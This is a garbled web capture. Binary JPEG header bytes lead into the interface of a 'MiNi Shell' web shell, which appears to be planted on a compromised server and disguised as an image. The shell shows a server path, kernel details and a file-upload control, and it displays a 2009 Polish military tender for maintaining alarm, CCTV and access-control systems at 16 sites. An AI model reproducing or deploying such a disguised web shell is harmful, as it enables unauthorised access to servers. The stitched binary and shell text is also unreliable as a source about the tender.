JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090216/29034-N-2009.html

<p class="kh_header"><b>Warszawa: Przedmiotem zamówienia jest zawarcie umowy ramowej na konserwację i naprawę systemów alarmowych, wizyjnych oraz kontroli dostępu</b><br>
<b>Numer ogłoszenia: 29034 - 2009; data zamieszczenia: 16.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 3090 , ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 022 6815337, faks 022 6815093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.9rbm.rembertow.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 3090.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zawarcie umowy ramowej na konserwację i naprawę systemów alarmowych, wizyjnych oraz kontroli dostępu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zawarcie umowy ramowej na konserwację i naprawę systemów alarmowych, wizyjnych oraz kontroli dostępu z podziałem na 16 zadań:
zadanie nr 1 - konserwacja TUS i UA i systemu wizyjnego w Komendzie 9 RBM - Skład Warszawa;
zadanie nr 2 - konserwacja TUS i UA i systemu wizyjnego w Składzie Pomiechówek;
zadanie nr 3 - konserwacja TUS i UA w Składzie Komorowo;
zadanie nr 4 - konserwacja TUS i UA i systemu wizyjnego w Składzie Hajnówka;
zadanie nr 5 - konserwacja TUS i UA w Składzie Bezwola;
zadanie nr 6 - konserwacja TUS i UA w Składzie Pilawa;
zadanie nr 7 - konserwacja TUS i UA i systemu wizyjnego w Składzie Puszcza Mariańska;
zadanie nr 8 - konserwacja TUS i UA w Składzie Zegrze;
zadanie nr 9 - konserwacja TUS i UA w WKU Ochota;
zadanie nr 10 - konserwacja TUS i UA w WSzW Warszawa;
zadanie nr 11- konserwacja TUS i UA w WKU Warszawa Mokotów;
zadanie nr 12 - konserwacja TUS i UA w WKU Warszawa Praga Północ;
zadanie nr 13 - konserwacja TUS i UA w WKU Warszawa Praga Południe;
zadanie nr 14 - konserwacja TUS i UA w WKU Warszawa Żoliborz
zadanie nr 15 - konserwacja TUS i UA w WKU Garwolin;
zadanie nr 16 - konserwacja TUS i UA w WKU Bielsk Podlaski.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  żąda wniesienia wadium w łącznej wysokości 8 955,00 PLN (słownie: osiem tysięcy dziewięćset pięćdziesiąt pięć), w tym na:
zadanie 1 -     850,00 PLN (słownie: osiemset pięćdziesiąt);
zadanie 2 -  2 400,00 PLN (słownie: dwa tysiące czterysta);
zadanie 3 -  1 300,00 PLN (słownie: tysiąc trzysta);
zadanie 4 -     500,00 PLN (słownie: pięćset);
zadanie 5 -  1 900,00 PLN (słownie: tysiąc dziewięćset);
zadanie 6 -     270,00 PLN (słownie: dwieście siedemdziesiąt);
zadanie 7 -     200,00 PLN (słownie: dwieście);
zadanie 8 -     750,00 PLN (słownie: siedemset pięćdziesiąt);
zadanie 9 -     100,00 PLN (słownie: sto);
zadanie 10 -   120,00 PLN (słownie: sto dwadzieścia);
zadanie 11 -     75,00 PLN (słownie: siedemdziesiąt pięć);
zadanie 12 -     90,00 PLN (słownie: dziewięćdziesiąt);
zadanie 13 -     75,00 PLN (słownie: siedemdziesiąt pięć);
zadanie 14 -     75,00 PLN (słownie: siedemdziesiąt pięć);
zadanie 15 -   100,00 PLN (słownie: sto);
zadanie 16 -   150,00 PLN (słownie: sto pięćdziesiąt);<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zgodnie z art. 22 Ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi  do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia;
1.4 nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy.

2. Sposób dokonania oceny spełniania przez wykonawców warunków udziału w postępowaniu.
2.1.  Zamawiający uzna, że Wykonawca posiada uprawnienia do wykonywania działalności, jeżeli:
 2.1.1  prowadzi działalność w zakresie objętym przedmiotem  zamówienia co jest odzwierciedlone określonymi  zapisami właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej; 
 2.1.2   posiada koncesje na prowadzenie działalności w zakresie ochrony osób i mienia,  w zakresie ochrony technicznej.
2.2 Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia, jeżeli: 
 2.2.1 Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum jedną usługę odpowiadającą swoim rodzajem i wartością usług stanowiącym przedmiot zamówienia. Wartość pojedynczej usługi winna być nie mniejsza niż:
           na zadanie 1 - 51 000,00zł;		na zadanie 2 - 144 000,00 zł;
           na zadanie 3 - 81 000,00 zł;		na zadanie 4 - 30 000,00 zł;
           na zadanie 5 - 116 000,00 zł;		na zadanie 6 - 16 000,00 zł; 
           na zadanie 7 - 12 000,00 zł;		na zadanie 8 - 45 000,00 zł;
           na zadanie 9 - 5 000,00 zł;		na zadanie  10 - 7 000,00 zł;
           na zadanie 11 - 4 000,00 zł;		na zadanie 12 - 5 000,00 zł;
           na zadanie 13 - 4 000,00 zł;		na zadanie 14 - 4 000,00 zł;
           na zadanie 15 - 6 000,00 zł;		na zadanie 16 - 9 000,00 zł.
2.2.2  Wykonawca dysponuje osobami , personelem legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem niezbędnym do wykonania zamówienia jeżeli pracownicy:
1. posiadają licencję pracownika ochrony technicznej dla wszystkich pracowników przewidzianych do realizacji zadań (II stopnia - projektanci, I stopnia - instalatorzy);
2.  posiadają poświadczenia bezpieczeństwa osobowego minimum do klauzuli poufne wydanych przez Służby Ochrony Państwa lub Pełnomocnika Ochrony przeszkolonego przez SOP dla instalatorów i projektantów systemów alarmowych oraz innych osób przewidzianych do realizacji wszystkich zadań wydanych przez Służby Ochrony Państwa lub Pełnomocnika Ochrony przeszkolonego przez SOP dla instalatorów i projektantów systemów alarmowych oraz innych osób przewidzianych do realizacji zadań;
3. posiadają świadectwa bezpieczeństwa przemysłowego minimum trzeciego stopnia o klauzuli  tajne do konserwacji systemu ADVISOR Master będącego częścią zadania nr 8;
4. posiadają świadectwa autoryzacji lub ukończenia przeszkolenia na montaż lub konserwację systemów:  SEMICO 2  - zadanie nr 2,3, 8;  LSM 256 - zadanie nr 5, 6;  3 GS - zadanie nr 4; COMPAS - zadanie nr 1; GALAXY - zadanie nr 1,4, 7, 10, 12;  ADVISOR  Master - zadanie nr 8; SATEL - zadanie nr 1, 9, 11, 13, 15; ROKONET - zadanie nr 14; SIMENS SI 410 - zadanie nr 16;
5.  posiadają zaświadczenia dla Pełnomocnika ochrony przeszkolonego w zakresie ochrony informacji niejawnych przez SOP;
6. posiadają dla instalatorów i projektantów - świadectwa ukończenia kursów w zakresie instalowania lub projektowania systemów alarmowych klasy SA-4.
2.3. Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej   wykonanie zamówienia, jeżeli:
 2.3.1 Wykonawca posiada zdolność kredytową lub środki finansowe na rachunku bankowym  w wysokości nie mniejszej niż:
na zadanie 1 - 51 000,00zł;		na zadanie 2 - 144 000,00 zł;
na zadanie 3 - 81 000,00 zł;		na zadanie 4 - 30 000,00 zł;           
na zadanie 5 - 116 000,00 zł;	na zadanie 6 - 16 000,00 zł; 
na zadanie 7 - 12 000,00 zł;		na zadanie 8 - 45 000,00 zł;
na zadanie 9 - 5 000,00 zł;		na zadanie  10 - 7 000,00 zł;
na zadanie 11 - 4 000,00 zł;		na zadanie 12 - 5 000,00 zł;
na zadanie 13 - 4 000,00 zł;		na zadanie 14 - 4 000,00 zł;
na zadanie 15 - 6 000,00 zł;		na zadanie 16 - 9 000,00 zł.
2.4.  Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z postępowania, jeżeli:
2.4.1 Wykonawca, nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2.4.2 Wykonawca (o którym mowa w art. 24 ust 1 pkt 4-8), nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.4.3 Wykonawca (podmiot zbiorowy), wobec którego sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary. 
2.5 Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z postępowania, jeżeli z przedstawionych przez Wykonawcę dokumentów i oświadczeń wynikać będzie, że nie występują uwarunkowania art. 24 ust. 1 i 2 ustawy.
3. Wykonawcy wspólnie ubiegający się o zamówienie publiczne.
3.1  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. (art.23 ustawy).
3.2 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.
3.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego warunki określone w punktach 1.2, oraz, 1.3 - zostaną spełnione, jeżeli spełniają je Wykonawcy wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zamawiający żąda złożenia do oferty niżej wymienionych:
1.1  Oświadczeń: 
  1.1.1 Oświadczenie o spełnieniu warunków określonych w art. 22, ust. 1 ustawy - wzór oświadczenia stanowi załącznik nr 3 do SIWZ;
 1.1.2 W przypadku wykorzystania potencjału innych podmiotów należy przedłożyć pisemne zobowiązanie tych podmiotów o udostępnieniu potencjału technicznego i osób zdolnych do wykonania zamówienia.
2  Dokumentów:
 2.1 W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania działalności, Zamawiający żąda następujących dokumentów: 
2.1.1 aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2.1.2   koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie  działalności w zakresie ochrony osób i mienia, w zakresie ochrony technicznej;
2.2 W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, zamawiający żąda następujących dokumentów:
2.2.1 wykazu, potwierdzającego, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie minimum jedną usługę odpowiadającą swoim rodzajem i wartością (wskazaną przez Zamawiającego w pkt. 2.2) usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane należycie - np. referencje. 
2.2.2  wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - dotyczy  w szczególności:
a) stosownych licencji pracownika ochrony technicznej dla wszystkich pracowników przewidzianych do realizacji zadań (II stopnia - projektanci, I stopnia - instalatorzy);
 b)  poświadczeń bezpieczeństwa osobowego minimum do klauzuli poufne wydanych przez Służby Ochrony Państwa lub Pełnomocnika Ochrony przeszkolonego przez SOP dla instalatorów i projektantów systemów alarmowych oraz innych osób przewidzianych do realizacji wszystkich zadań wydanych przez Służby Ochrony Państwa lub Pełnomocnika Ochrony przeszkolonego przez SOP dla instalatorów i projektantów systemów alarmowych oraz innych osób przewidzianych do realizacji zadań  - załącznik nr 5;
c) świadectwa bezpieczeństwa przemysłowego minimum trzeciego stopnia o klauzuli  tajne do konserwacji systemu ADVISOR Master będącego częścią zadania nr 8 - załącznik nr 6 ;
d) świadectw autoryzacji lub ukończenia przeszkolenia na montaż lub konserwację systemów:  SEMICO 2  - zadanie nr 2,3, 8;  LSM 256 - zadanie nr 5, 6;  3 GS - zadanie nr 4;  COMPAS - zadanie nr 1; GALAXY - zadanie nr 1,4, 7, 10, 12;  ADVISOR  Master - zadanie nr 8; SATEL - zadanie nr 1, 9, 11, 13, 15; ROKONET - zadanie nr 14; SIMENS SI 410 - zadanie nr 16;
e) zaświadczeń dla Pełnomocnika ochrony przeszkolonego w zakresie ochrony informacji niejawnych przez SOP;
f) dla instalatorów i projektantów - świadectwa ukończenia kursów w zakresie instalowania lub projektowania systemów alarmowych klasy SA-4.
2.3. W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
2.3.1 informacji, banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek bankowy, potwierdzającej posiadanie środków finansowych lub zdolności kredytowej wykonawcy, (w wysokości wskazanej przez Zamawiającego w pkt  2.3.1), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.4  W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy Zamawiający żąda następujących dokumentów: 
2.4.1  aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenia o uzyskaniu przez Wykonawcę zwolnieniu, przewidzianego prawem, odroczeniu lub rozłożeniu na raty, zaległych płatności, lub wstrzymaniu w całości wykonania decyzji właściwego organu - dokument winien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.4.2  aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument winien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.4.3  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.4.4  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. Dokumenty mogą być składane w formie oryginału lub kopii poświadczonej przez Wykonawcę za zgodność z oryginałem. 
4. Zamawiający zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
5. Dokumenty sporządzone w języku obcym, winny być składane wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego, poświadczone za zgodność przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.9rbm.rembertow.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać  w siedzibie Zamawiającego,ul. Marsa 110, 04 - 470 Warszawa, budynek nr 1 pokój nr 2  lub pocztą na pisemny wniosek wykonawcy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 08:00, miejsce: Siedziba Zamawiającego - Warszawa,  ul Marsa 110 - kancelaria ogólna, budynek nr 3 pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja TUS i UA i systemu wizyjnego w Komendzie 9 RBM - Skład Warszawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostepu:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego COMPAS zainstalowanego w Komendzie 9 RBM i Składzie. Wykonanie dwunastu konserwacji systemu.
2. Utrzymanie  w najwyższej sprawności technicznej dwóch systemów alarmowych GALAXY zainstalowanych w Komendzie 9 RBM i Składzie. Wykonanie dwunastu konserwacji systemów.
3. Utrzymanie w najwyższej sprawności technicznej dwóch systemów alarmowych SATEL zainstalowanych w Komendzie 9 RBM. Wykonanie dwunastu konserwacji systemów.
4. Utrzymanie w najwyższej sprawności technicznej systemu nadzoru wizyjnego zainstalowanego w Komendzie 9 RBM i Składzie. Wykonanie dwunastu konserwacji systemu.
5. Utrzymanie w najwyższej sprawności technicznej systemu kontroli dostępu zainstalowanego w Komendzie 9 RBM. Wykonanie dwunastu konserwacji systemu.
6. Utrzymanie w najwyższej sprawności technicznej systemu kontroli wizyjnego zainstalowanego w Komendzie 9 RBM. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja TUS i UA i systemu wizyjnego w Składzie Pomiechówek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Pomiechówek;
1. Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SEMICO  zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
2.Utrzymanie w najwyższej sprawności technicznej systemu nadzoru wizyjnego zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacja TUS i UA w Składzie Komorowo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Komorowo:
 1. Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SEMICO  zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
2. Utrzymanie w najwyższej sprawności technicznej systemu nadzoru wizyjnego zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja TUS i UA i systemu wizyjnego w Składzie Hajnówka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Hajnówka:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego 3 GS zainstalowanego w Składzie. Wykonanie dwunastukonserwacji systemu.
2. Utrzymanie w najwyższej sprawności technicznej systemu alarmowego GALAXY 520 zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
3.Utrzymanie w najwyższej sprawności technicznej dwóch systemów nadzoru wizyjnego zainstalowanych w Składzie. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwacja TUS i UA w Składzie Bezwola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontrolo dostępu w Składzie Bezwola:
